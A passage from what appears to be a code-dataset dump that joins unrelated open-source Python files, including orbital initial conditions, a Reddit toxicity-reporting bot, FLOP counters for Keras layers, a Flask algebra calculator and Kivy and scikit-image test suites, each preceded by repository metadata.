(0.0886, 0.0886),
(0.014, -0.099),
)
),
)
# solar system reduced to four bodies
small_solar_system = (
np.array((solar, mercury, venus, uranus)) / solar,
np.array(((0, 0), (0, 1.29), (0, -2.4), (-45.07, 45.07))),
np.array(((0, 0), (0.88, 0), (-0.645, 0), (0.0886, 0.0886))),
)
# periodic figure eight structure by:
# Chenciner, Montgomery. "A remarkable periodic solution of the
# three-body problem in the case of equal masses". 2000.
figure_eight = (
np.array((1.0, 1.0, 1.0)),
np.array(
(
(-0.97000436, 0.24308753),
(0.0, 0.0),
(0.97000436, -0.24308753),
)
),
np.array(
(
(0.93240737 / 2, 0.86473146 / 2),
(-0.93240737, -0.86473146),
(0.93240737 / 2, 0.86473146 / 2),
)
),
)
random_planetary_system = generate_planetary_system(20, seed=31415)
# periodic initial conditions by:
# <NAME>, <NAME>, <NAME>. "The 1223 new periodic orbits of
# planar three-body problem with unequal mass and zero angular momentum". 2017.
three_body_periodic1 = (
np.array((1.0, 1.0, 0.5)),
np.array(
(
(-1.0, 0.0),
(1.0, 0.0),
(0.0, 0.0),
)
),
np.array(
(
(0.2009656237, 0.2431076328),
(0.2009656237, 0.2431076328),
(-4 * 0.2009656237, -4 * 0.2431076328),
)
),
)
three_body_periodic2 = (
np.array((1.0, 1.0, 2.0)),
np.array(
(
(-1.0, 0.0),
(1.0, 0.0),
(0.0, 0.0),
)
),
np.array(
(
(0.6649107583, 0.8324167864),
(0.6649107583, 0.8324167864),
(-0.6649107583, -0.8324167864),
)
),
)
# periodic free-fall initial conditions by:
# <NAME>, <NAME>. "Collisionless periodic
# orbits in the free-fall three body problem". 2018.
free_fall_periodic1 = (
np.array((1.0, 0.8, 0.8)),
np.array(
(
(-0.5, 0.0),
(0.5, 0.0),
(0.0009114239, 0.3019805958),
)
),
np.array(
(
(0.0, 0.0),
(0.0, 0.0),
(0.0, 0.0),
)
),
)
free_fall_periodic2 = (
np.array((1.0, 0.8, 0.4)),
np.array(
(
(-0.5, 0.0),
(0.5, 0.0),
(0.1204686367, 0.3718569619),
)
),
np.array(
(
(0.0, 0.0),
(0.0, 0.0),
(0.0, 0.0),
)
),
)
free_fall_periodic3 = (
np.array((1.0, 0.8, 0.2)),
np.array(
(
(-0.5, 0.0),
(0.5, 0.0),
(0.1310631652, 0.3036588095),
)
),
np.array(
(
(0.0, 0.0),
(0.0, 0.0),
(0.0, 0.0),
)
),
)
```
|
{
"source": "jeypiti/RedditPerspectiveAPI",
"score": 2
}
|
#### File: jeypiti/RedditPerspectiveAPI/script.py
```python
import asyncio
import logging
from random import randint
import aiohttp
from asyncpraw import Reddit
from asyncpraw.models import Comment
from asyncprawcore.exceptions import ServerError
from dynaconf import Dynaconf
from discord_logging import DiscordWebhookHandler
config = Dynaconf(settings_files=["settings.toml", ".secrets.toml"])
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(logging.Formatter(fmt="[{levelname}] {message}", style="{"))
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
if config.webhook:
discord_handler = DiscordWebhookHandler(config.webhook, min_emit_interval=0.0)
discord_handler.setFormatter(
logging.Formatter(
fmt="[{levelname} | {asctime}] {message}",
datefmt="%Y-%m-%d %H:%M:%S %Z",
style="{",
)
)
discord_handler.setLevel(logging.INFO)
logger.addHandler(discord_handler)
url = f"https://commentanalyzer.googleapis.com/v1alpha1/comments:analyze?key={config.credentials.perspective.api_key}"
params = {
"languages": ["en"],
"requestedAttributes": {
"TOXICITY": {},
"SEVERE_TOXICITY": {},
"IDENTITY_ATTACK": {},
"INSULT": {},
"THREAT": {},
},
"communityId": f"reddit.com/r/{config.subreddit}",
}
async def authenticate_reddit(username: str) -> Reddit:
reddit_instance = Reddit(
username=username,
user_agent=f"web:mod.{config.subreddit}.{username}.Perspective:v{config.version} by {config.author})",
**config.credentials[username],
)
logger.info(f"Authenticated as {await reddit_instance.user.me()}!")
return reddit_instance
async def main():
mod_reddit = await authenticate_reddit(config.mod_username)
stream_reddit = await authenticate_reddit(config.stream_username)
subreddit = await stream_reddit.subreddit(config.subreddit)
while True:
try:
async for comment in subreddit.stream.comments(skip_existing=False):
await process_comment(comment, mod_reddit)
except ServerError as e:
sleep_duration = randint(25, 35)
logger.warning(f"Server error, retrying in {sleep_duration}s", exc_info=e)
await asyncio.sleep(sleep_duration)
except Exception as e:
logger.error(f"Encountered exception:", exc_info=e)
raise e
async def process_comment(comment: Comment, mod_reddit: Reddit) -> None:
results = await evaluate_comment(comment)
cleaned_permalink = comment.permalink.replace(comment.permalink.split("/")[5], "_")
log_content = (
f"New comment {comment.id} by {comment.author}\n"
f"https://www.reddit.com{cleaned_permalink}\n"
f"{comment.body[:1500]}\n\n"
)
log_func = logger.debug
for attribute, score in results.items():
log_content += f"{attribute:16s}: {score:6.2%}\n"
if score >= config.threshold[attribute]:
log_func = logger.info
# handoff to mod account to enable free-form report
comment = await mod_reddit.comment(comment.id, lazy=True)
await comment.report(
f"{attribute}: {score:.2%} | threshold: {config.threshold[attribute]:.2%}"
)
log_func(log_content)
async def evaluate_comment(comment: Comment) -> dict[str, float]:
params["comment"] = {"text": comment.body}
async with aiohttp.ClientSession() as session:
# sleep to avoid hitting rate limit
await asyncio.sleep(1)
async with session.post(url, json=params) as response:
response_dict = await response.json()
return {
attribute.lower(): val["summaryScore"]["value"]
for attribute, val in response_dict["attributeScores"].items()
}
if __name__ == "__main__":
try:
asyncio.run(main())
except KeyboardInterrupt:
pass
```
|
{
"source": "JeyRathnam/python-restful",
"score": 3
}
|
#### File: python-restful/Models/game_session.py
```python
from Main import db
from serializer.JsonSerializer import JsonSerializer
class Game_session(db.Model, JsonSerializer):
__tablename__ = 'game_session'
session_id = db.Column(db.Integer,primary_key=True, autoincrement=True)
ip_address = db.Column(db.String)
game_id = db.Column(db.Integer,db.ForeignKey('games.game_id'))
player_count = db.Column(db.Integer)
winning_user = db.Column(db.Integer, db.ForeignKey('users.user_id'))
session_start_time = db.Column(db.String)
def __init__(self,_ip_address, _game_id, _player_count , _winning_user,_session_start_time):
self.ip_address = _ip_address
self.game_id = _game_id
self.player_count = _player_count
self.winning_user = _winning_user
self.session_start_time = _session_start_time
```
|
{
"source": "jeyrb/python-rflink",
"score": 3
}
|
#### File: python-rflink/rflink/__main__.py
```python
import asyncio
import logging
import sys
from typing import Dict, Optional, Sequence, Type # noqa: unused-import
import pkg_resources
from docopt import docopt
from .protocol import ( # noqa: unused-import
CommandSerialization,
EventHandling,
InverterProtocol,
PacketHandling,
ProtocolBase,
RepeaterProtocol,
RflinkProtocol,
create_rflink_connection,
)
PROTOCOLS = {
"command": RflinkProtocol,
"event": EventHandling,
"print": PacketHandling,
"invert": InverterProtocol,
"repeat": RepeaterProtocol,
} # type: Dict[str, Type[ProtocolBase]]
ALL_COMMANDS = ["on", "off", "allon", "alloff", "up", "down", "stop", "pair"]
def main(
argv: Sequence[str] = sys.argv[1:], loop: Optional[asyncio.AbstractEventLoop] = None
) -> None:
"""Parse argument and setup main program loop."""
args = docopt(
__doc__, argv=argv, version=pkg_resources.require("rflink")[0].version
)
level = logging.ERROR
if args["-v"]:
level = logging.INFO
if args["-v"] == 2:
level = logging.DEBUG
logging.basicConfig(level=level)
if not loop:
loop = asyncio.get_event_loop()
if args["--ignore"]:
ignore = args["--ignore"].split(",")
else:
ignore = []
command = next((c for c in ALL_COMMANDS if args[c] is True), None)
if command:
protocol_type = PROTOCOLS["command"]
else:
protocol_type = PROTOCOLS[args["-m"]]
conn = create_rflink_connection(
protocol=protocol_type,
host=args["--host"],
port=args["--port"],
baud=args["--baud"],
loop=loop,
ignore=ignore,
)
transport, protocol = loop.run_until_complete(conn)
try:
if command:
assert isinstance(protocol, CommandSerialization)
for _ in range(int(args["--repeat"])):
loop.run_until_complete(
protocol.send_command_ack(args["<id>"], command)
)
else:
loop.run_forever()
except KeyboardInterrupt:
# cleanup connection
transport.close()
loop.run_forever()
finally:
loop.close()
```
|
{
"source": "jeyrce/vshare",
"score": 3
}
|
#### File: vshare/utils/page_breaker.py
```python
from django.core.paginator import Paginator
# 分页方法
def pagebreaker(queryset, num=1, perpage=10):
'''
:param queryset: 要进行分页的数据集合
:param num: 分页后返回页码
:param perpage: 每页多少条记录
:return: 对应num的页内容,分页区间,总页数
'''
num = int(num)
page_datas = Paginator(queryset, per_page=perpage)
# 控制当前页不可越界
if num <= 0:
num = 1
if num > page_datas.num_pages:
num = page_datas.num_pages
# 生成前端需要的页码数
# 起始数, 下图中的10表示一个分页条最多显示10个
start = ((num - 1) // 10) * 10 + 1
# 末尾数
end = start + 10
# 判断end是否越界
if end > page_datas.num_pages:
end = page_datas.num_pages
return page_datas.page(num), range(start, end + 1), page_datas.num_pages
if __name__ == '__main__':
pass
```
|
{
"source": "JeysonAc/machinelearning-az",
"score": 4
}
|
#### File: Exercises/Regression/multiple_linear_regression.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Dataset
dataset = pd.read_csv("../../datasets/Part 2 - Regression/Section 5 - Multiple Linear Regression/50_Startups.csv")
x = dataset.iloc[:,:-1].values
y = dataset.iloc[:,4].values
#Manejo de variables categóricas
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_x = LabelEncoder()
x[:,3] = labelencoder_x.fit_transform(x[:,3])
onehotencoder = OneHotEncoder(categorical_features=[3])
x = onehotencoder.fit_transform(x).toarray()
#Evitar trampa de variables fictisias
x = x[:,1:]
#Divisón del Dataset
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2,random_state=0)
#------------------CONSTRUCCIÓN DEL MODELO---------------------
#Ajustar el modelo con el conjunto de entrenamiento All-In
from sklearn.linear_model import LinearRegression
regression = LinearRegression()
regression.fit(x_train,y_train)
#Predicción de resultados en test
y_pred = regression.predict(x_test)
#Ajustar el modelo óptimo con la Eliminación Hacias Atrás
import statsmodels.api as sm
x = np.append(arr = np.ones((50,1)).astype(int),values = x, axis = 1)
x_opt = x[:,[0,1,2,3,4,5]]
sl = 0.05
"""
x_opt = x[:,[0,1,2,3,4,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,1,3,4,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,3,4,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,3,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,3]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
"""
def backwardElimination(x,sl):
numVars=len(x[0])
for i in range(0,numVars):
regressor_ols = sm.OLS(y,x.tolist()).fit()
maxVar = max(regressor_ols.pvalues).astype(float)
if maxVar > sl:
for j in range(0,numVars-i):
if(regressor_ols.pvalues[j].astype(float) == maxVar):
x = np.delete(x,j,1)
regressor_ols.summary()
return x
x_modeled = backwardElimination(x_opt,sl)
```
|
{
"source": "JeysonCastilloAI/flopco-keras",
"score": 3
}
|
#### File: flopco-keras/flopco_keras/compute_layer_flops.py
```python
def numel(w : list):
out = 1
for k in w:
out *= k
return int(out)
def compute_input_flops(layer, macs = False):
return 0
def compute_TFOpLambda(layer, macs = False):
return 0
def compute_padding_flops(layer, macs = False):
return 0
def compute_activation_flops(layer, macs = False):
return 0
def compute_tfop_flops(layer, macs = False):
return 0
def compute_add_flops(layer, macs = False):
return 0
def compute_flatten(layer, macs = False):
return 0
def compute_conv1d_flops(layer, macs = False):
if layer.data_format == "channels_first":
_, input_channels, _, = layer.input_shape
_, output_channels, w, = layer.output_shape
elif layer.data_format == "channels_last":
_, _, input_channels = layer.input_shape
_, w, output_channels = layer.output_shape
w_w = layer.kernel_size[0]
flops = w * output_channels * input_channels * w_w
if not macs:
if layer.use_bias == True:
flops_bias = layer.output_shape[1]*layer.output_shape[2]
elif layer.use_bias == False:
flops_bias = 0
flops = 2*int(flops)+flops_bias
return int(flops)
def compute_zeroflops(layer, macs = False):
return 0
def compute_conv2d_flops(layer, macs = False):
# _, cin, h, w = input_shape
if layer.data_format == "channels_first":
_, input_channels, _, _ = layer.input_shape
_, output_channels, h, w, = layer.output_shape
elif layer.data_format == "channels_last":
_, _, _, input_channels = layer.input_shape
_, h, w, output_channels = layer.output_shape
w_h, w_w = layer.kernel_size
# flops = h * w * output_channels * input_channels * w_h * w_w / (stride**2)
flops = h * w * output_channels * input_channels * w_h * w_w
if not macs:
flops_bias = numel(layer.output_shape[1:]) if layer.use_bias is not None else 0
flops = 2 * flops + flops_bias
return int(flops)
def compute_fc_flops(layer, macs = False):
ft_in, ft_out = layer.input_shape[-1], layer.output_shape[-1]
flops = ft_in * ft_out
if not macs:
flops_bias = ft_out if layer.use_bias is not None else 0
flops = 2 * flops + flops_bias
return int(flops)
def compute_bn2d_flops(layer, macs = False):
# subtract, divide, gamma, beta
flops = 2 * numel(layer.input_shape[1:])
if not macs:
flops *= 2
return int(flops)
def compute_relu_flops(layer, macs = False):
flops = 0
if not macs:
flops = numel(layer.output_shape[1:])
return int(flops)
def compute_maxpool2d_flops(layer, macs = False):
flops = 0
if not macs:
flops = layer.pool_size[0]**2 * numel(layer.output_shape[1:])
return flops
def compute_maxpool1d_flops(layer, macs = False):
flops = 0
if not macs:
flops = layer.pool_size[0]*2 * numel(layer.output_shape[1:])
return flops
def compute_pool2d_flops(layer, macs = False):
flops = 0
if not macs:
flops = layer.pool_size[0]**2 * numel(layer.output_shape[1:])
return flops
def compute_globalavgpool2d_flops(layer, macs = False):
if layer.data_format == "channels_first":
_, input_channels, h, w = layer.input_shape
_, output_channels = layer.output_shape
elif layer.data_format == "channels_last":
_, h, w, input_channels = layer.input_shape
_, output_channels = layer.output_shape
return h*w
def compute_softmax_flops(layer, macs = False):
nfeatures = numel(layer.input_shape[1:])
total_exp = nfeatures # https://stackoverflow.com/questions/3979942/what-is-the-complexity-real-cost-of-exp-in-cmath-compared-to-a-flop
total_add = nfeatures - 1
total_div = nfeatures
flops = total_div + total_exp
if not macs:
flops += total_add
return flops
```
|
{
"source": "JeysonFlores/AlgebraicCalc",
"score": 3
}
|
#### File: JeysonFlores/AlgebraicCalc/Osi.py
```python
from flask import Flask, render_template
from flask import request
from sympy.solvers import solve
from sympy import plot
import json
import Operaciones as o
import Forms1
import time
app = Flask(__name__)
#-------------------------------------Ecuaciones-------------------------
@app.route("/Ecuaciones", methods = ['GET', 'POST'])
def main_ec():
graf=""
ec_form = Forms1.Formularios_EC(request.form)
ecr=""
if (request.method) == 'POST':
ec=str(ec_form.Ecuacion.data)
if(ec==''):
ecr='CampoVacio'
else:
try:
ecr = solve(ec)
except Exception as e:
ecr = "Sintaxis Inválida"
if(ecr!='Sintaxis Inválida'):
graf=o.Graficar(ec)
if(graf=="Sintaxis Inválida"):
ecr = graf
graf = None
#ecr = o.Reem(ecr)
return render_template('Ecuaciones.html', formu = ec_form, res = ecr, graf=graf,no_cache=time.time())
#----------------------------------------------Desigualdades---------------
@app.route("/Desigualdades", methods = ['GET', 'POST'])
def main_des():
ec_form = Forms1.Formulario_DES(request.form)
ecr=""
if (request.method) == 'POST':
ec=str(ec_form.Ecuacion.data)
if(ec==''):
ecr=''
else:
try:
ecr = solve(ec, "x")
except Exception as e:
ecr = "Sintaxis Inválida"
return render_template('Main.html', formu = ec_form, res = ecr)
#------------------Productos Cartesianos-------------------------------
@app.route("/Prods", methods = ['GET', 'POST'])
def main_prod():
prod_form = Forms1.Formularios_AXB(request.form)
prod = ""
axb = ""
oie = ""
funk = ""
if (request.method) == 'POST':
a = str(prod_form.A.data)
b = str(prod_form.B.data)
if((a=="") or (b=="")):
oie="Error: Uno de los campos está vacío"
else:
a = o.Conjunto(a)
b = o.Conjunto(b)
axb,funk = o.prod_cart(a,b)
return render_template("prod_cart.html", formu = prod_form, axb = axb,error = oie, funk = funk)
#-------------------------------------Matrices-------------------------
@app.route("/M1", methods = ['GET', 'POST'])
def main_mat1():
return render_template("MatrizUna.html",no_cache=time.time())
@app.route("/M2")
def main_mat2():
return render_template("MatrizDos.html")
@app.route("/Vectores", methods = ['GET', 'POST'])
def main_vec():
return render_template("Vectores.html",no_cache=time.time())
@app.route("/FAQ",methods = ['GET', 'POST'])
def main_faq():
return render_template("FAQ.html")
if __name__ == '__main__':
app.run(debug=True)
```
|
{
"source": "jeysonmc/kibot",
"score": 3
}
|
#### File: jeysonmc/kibot/tests.py
```python
import unittest
from unittest import TestCase
from kibot import KibotTestCase, run_kibot_tests, WidgetNotFoundError
from kivy.factory import Factory
class TestKibot(KibotTestCase):
"""Kibot testing"""
def test_find(self):
widget = self.kibot.find(text="Kibot Test")
self.assertEqual(widget, self.app.root.my_button)
def test_find_by_class(self):
widget = self.kibot.find(class_="Button")
self.assertEqual(widget, self.app.root.my_button)
def test_find_by_id(self):
widget = self.kibot.find(id="_my_button")
self.assertEqual(widget, self.app.root.my_button)
def test_do(self):
from functools import partial
x = []
def test(x):
x.append(1)
self.kibot.do(partial(test, x))
self.kibot.wait_until()
self.assertEqual(x[0], 1)
def test_wait(self):
import time
k = time.time()
self.kibot.wait(2)
self.kibot.do(lambda dt: dt)
self.kibot.wait_until()
self.assertGreaterEqual(time.time() - k, 2)
def test_do_press(self):
self.kibot.do_press(widget=self.app.root.slider, x=0.5, y=0.5)
self.kibot.wait_until()
self.assertEqual(self.app.root.slider.value, 50)
def test_do_release(self):
self.kibot.do_release()
def test_do_click(self):
self.kibot.do_press(widget=self.app.root.my_button)
self.kibot.wait_until()
self.assertEqual(self.app.root.my_button.text, "Pressed!")
def test_do_move(self):
widget = self.app.root.slider
self.kibot.do_press(widget=widget, x=0.0, y=0.5)
self.kibot.do_move(widget=widget, x=0.5, y=0.5)
self.kibot.do_release(widget=widget, x=0.5, y=0.5)
self.kibot.wait_until()
self.assertEqual(widget.value, 50)
def test_do_keystroke(self):
widget = self.app.root.textinput
self.kibot.do_click(widget=widget)
self.kibot.do_keystroke('h')
self.kibot.do_keystroke(text='ello world')
self.kibot.wait_until()
self.assertEqual("hello world", widget.text)
def test_record(self):
self.kibot.record('delete.kibot')
self.kibot.do_press(x=0, y=100)
self.kibot.wait_until()
self.assertEqual("do_press" in str(self.kibot.recorded_commands), True)
def test_execute_record(self):
widget = self.app.root.my_button
try:
with open("delete.kibot", 'w') as f:
f.write("self.do_press(x=100, y=100)")
self.kibot.execute_record("delete.kibot")
self.kibot.wait_until()
except Exception as e:
raise e
finally:
import os
os.remove("delete.kibot")
self.assertEqual(widget.text, "Pressed!")
if __name__ == '__main__':
from kivy.app import App
from kivy.lang import Builder
kv = """
<RootWidget@BoxLayout>:
orientation: 'vertical'
my_button: _my_button
slider: _slider
textinput: _tinput
lbl: _lbl
BoxLayout:
Button:
id: _my_button
text: "Kibot Test"
on_press: self.text="Pressed!"
TextInput:
id: _tinput
Slider:
id: _slider
step: 1
on_value: _lbl.text="%s"%(self.value)
Label:
id: _lbl
size_hint_y: 0.1
"""
class TestApp(App):
def build(self):
return Factory.RootWidget()
Builder.load_string(kv)
app = TestApp()
run_kibot_tests(app) # This runs the app and calls unittest.main()
```
|
{
"source": "jeysonmc/scikit-image",
"score": 2
}
|
#### File: rank/tests/test_rank.py
```python
import numpy as np
from numpy.testing import run_module_suite, assert_array_equal, assert_raises
from skimage import img_as_ubyte, img_as_uint, img_as_float
from skimage import data, util
from skimage.morphology import cmorph, disk
from skimage.filter import rank
def test_random_sizes():
# make sure the size is not a problem
niter = 10
elem = np.array([[1, 1, 1], [1, 1, 1], [1, 1, 1]], dtype=np.uint8)
for m, n in np.random.random_integers(1, 100, size=(10, 2)):
mask = np.ones((m, n), dtype=np.uint8)
image8 = np.ones((m, n), dtype=np.uint8)
out8 = np.empty_like(image8)
rank.mean(image=image8, selem=elem, mask=mask, out=out8,
shift_x=0, shift_y=0)
assert_array_equal(image8.shape, out8.shape)
rank.mean(image=image8, selem=elem, mask=mask, out=out8,
shift_x=+1, shift_y=+1)
assert_array_equal(image8.shape, out8.shape)
image16 = np.ones((m, n), dtype=np.uint16)
out16 = np.empty_like(image8, dtype=np.uint16)
rank.mean(image=image16, selem=elem, mask=mask, out=out16,
shift_x=0, shift_y=0)
assert_array_equal(image16.shape, out16.shape)
rank.mean(image=image16, selem=elem, mask=mask, out=out16,
shift_x=+1, shift_y=+1)
assert_array_equal(image16.shape, out16.shape)
rank.mean_percentile(image=image16, mask=mask, out=out16,
selem=elem, shift_x=0, shift_y=0, p0=.1, p1=.9)
assert_array_equal(image16.shape, out16.shape)
rank.mean_percentile(image=image16, mask=mask, out=out16,
selem=elem, shift_x=+1, shift_y=+1, p0=.1, p1=.9)
assert_array_equal(image16.shape, out16.shape)
def test_compare_with_cmorph_dilate():
# compare the result of maximum filter with dilate
image = (np.random.random((100, 100)) * 256).astype(np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
for r in range(1, 20, 1):
elem = np.ones((r, r), dtype=np.uint8)
rank.maximum(image=image, selem=elem, out=out, mask=mask)
cm = cmorph._dilate(image=image, selem=elem)
assert_array_equal(out, cm)
def test_compare_with_cmorph_erode():
# compare the result of maximum filter with erode
image = (np.random.random((100, 100)) * 256).astype(np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
for r in range(1, 20, 1):
elem = np.ones((r, r), dtype=np.uint8)
rank.minimum(image=image, selem=elem, out=out, mask=mask)
cm = cmorph._erode(image=image, selem=elem)
assert_array_equal(out, cm)
def test_bitdepth():
# test the different bit depth for rank16
elem = np.ones((3, 3), dtype=np.uint8)
out = np.empty((100, 100), dtype=np.uint16)
mask = np.ones((100, 100), dtype=np.uint8)
for i in range(5):
image = np.ones((100, 100), dtype=np.uint16) * 255 * 2 ** i
r = rank.mean_percentile(image=image, selem=elem, mask=mask,
out=out, shift_x=0, shift_y=0, p0=.1, p1=.9)
def test_population():
# check the number of valid pixels in the neighborhood
image = np.zeros((5, 5), dtype=np.uint8)
elem = np.ones((3, 3), dtype=np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
rank.pop(image=image, selem=elem, out=out, mask=mask)
r = np.array([[4, 6, 6, 6, 4],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[4, 6, 6, 6, 4]])
assert_array_equal(r, out)
def test_structuring_element8():
# check the output for a custom structuring element
r = np.array([[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 255, 0, 0, 0],
[0, 0, 255, 255, 255, 0],
[0, 0, 0, 255, 255, 0],
[0, 0, 0, 0, 0, 0]])
# 8-bit
image = np.zeros((6, 6), dtype=np.uint8)
image[2, 2] = 255
elem = np.asarray([[1, 1, 0], [1, 1, 1], [0, 0, 1]], dtype=np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=1, shift_y=1)
assert_array_equal(r, out)
# 16-bit
image = np.zeros((6, 6), dtype=np.uint16)
image[2, 2] = 255
out = np.empty_like(image)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=1, shift_y=1)
assert_array_equal(r, out)
def test_pass_on_bitdepth():
# should pass because data bitdepth is not too high for the function
image = np.ones((100, 100), dtype=np.uint16) * 2 ** 11
elem = np.ones((3, 3), dtype=np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
def test_inplace_output():
# rank filters are not supposed to filter inplace
selem = disk(20)
image = (np.random.random((500, 500)) * 256).astype(np.uint8)
out = image
assert_raises(NotImplementedError, rank.mean, image, selem, out=out)
def test_compare_autolevels():
# compare autolevel and percentile autolevel with p0=0.0 and p1=1.0
# should returns the same arrays
image = util.img_as_ubyte(data.camera())
selem = disk(20)
loc_autolevel = rank.autolevel(image, selem=selem)
loc_perc_autolevel = rank.autolevel_percentile(image, selem=selem,
p0=.0, p1=1.)
assert_array_equal(loc_autolevel, loc_perc_autolevel)
def test_compare_autolevels_16bit():
# compare autolevel(16-bit) and percentile autolevel(16-bit) with p0=0.0
# and p1=1.0 should returns the same arrays
image = data.camera().astype(np.uint16) * 4
selem = disk(20)
loc_autolevel = rank.autolevel(image, selem=selem)
loc_perc_autolevel = rank.autolevel_percentile(image, selem=selem,
p0=.0, p1=1.)
assert_array_equal(loc_autolevel, loc_perc_autolevel)
def test_compare_ubyte_vs_float():
# Create signed int8 image that and convert it to uint8
image_uint = img_as_ubyte(data.camera()[:50, :50])
image_float = img_as_float(image_uint)
methods = ['autolevel', 'bottomhat', 'equalize', 'gradient', 'threshold',
'subtract_mean', 'enhance_contrast', 'pop', 'tophat']
for method in methods:
func = getattr(rank, method)
out_u = func(image_uint, disk(3))
out_f = func(image_float, disk(3))
assert_array_equal(out_u, out_f)
def test_compare_8bit_unsigned_vs_signed():
# filters applied on 8-bit image ore 16-bit image (having only real 8-bit
# of dynamic) should be identical
# Create signed int8 image that and convert it to uint8
image = img_as_ubyte(data.camera())
image[image > 127] = 0
image_s = image.astype(np.int8)
image_u = img_as_ubyte(image_s)
assert_array_equal(image_u, img_as_ubyte(image_s))
methods = ['autolevel', 'bottomhat', 'equalize', 'gradient', 'maximum',
'mean', 'subtract_mean', 'median', 'minimum', 'modal',
'enhance_contrast', 'pop', 'threshold', 'tophat']
for method in methods:
func = getattr(rank, method)
out_u = func(image_u, disk(3))
out_s = func(image_s, disk(3))
assert_array_equal(out_u, out_s)
def test_compare_8bit_vs_16bit():
# filters applied on 8-bit image ore 16-bit image (having only real 8-bit
# of dynamic) should be identical
image8 = util.img_as_ubyte(data.camera())
image16 = image8.astype(np.uint16)
assert_array_equal(image8, image16)
methods = ['autolevel', 'bottomhat', 'equalize', 'gradient', 'maximum',
'mean', 'subtract_mean', 'median', 'minimum', 'modal',
'enhance_contrast', 'pop', 'threshold', 'tophat']
for method in methods:
func = getattr(rank, method)
f8 = func(image8, disk(3))
f16 = func(image16, disk(3))
assert_array_equal(f8, f16)
def test_trivial_selem8():
# check that min, max and mean returns identity if structuring element
# contains only central pixel
image = np.zeros((5, 5), dtype=np.uint8)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[0, 0, 0], [0, 1, 0], [0, 0, 0]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_trivial_selem16():
# check that min, max and mean returns identity if structuring element
# contains only central pixel
image = np.zeros((5, 5), dtype=np.uint16)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[0, 0, 0], [0, 1, 0], [0, 0, 0]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_smallest_selem8():
# check that min, max and mean returns identity if structuring element
# contains only central pixel
image = np.zeros((5, 5), dtype=np.uint8)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[1]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_smallest_selem16():
# check that min, max and mean returns identity if structuring element
# contains only central pixel
image = np.zeros((5, 5), dtype=np.uint16)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[1]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_empty_selem():
# check that min, max and mean returns zeros if structuring element is
# empty
image = np.zeros((5, 5), dtype=np.uint16)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
res = np.zeros_like(image)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[0, 0, 0], [0, 0, 0]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(res, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(res, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(res, out)
def test_otsu():
# test the local Otsu segmentation on a synthetic image
# (left to right ramp * sinus)
test = np.tile([128, 145, 103, 127, 165, 83, 127, 185, 63, 127, 205, 43,
127, 225, 23, 127],
(16, 1))
test = test.astype(np.uint8)
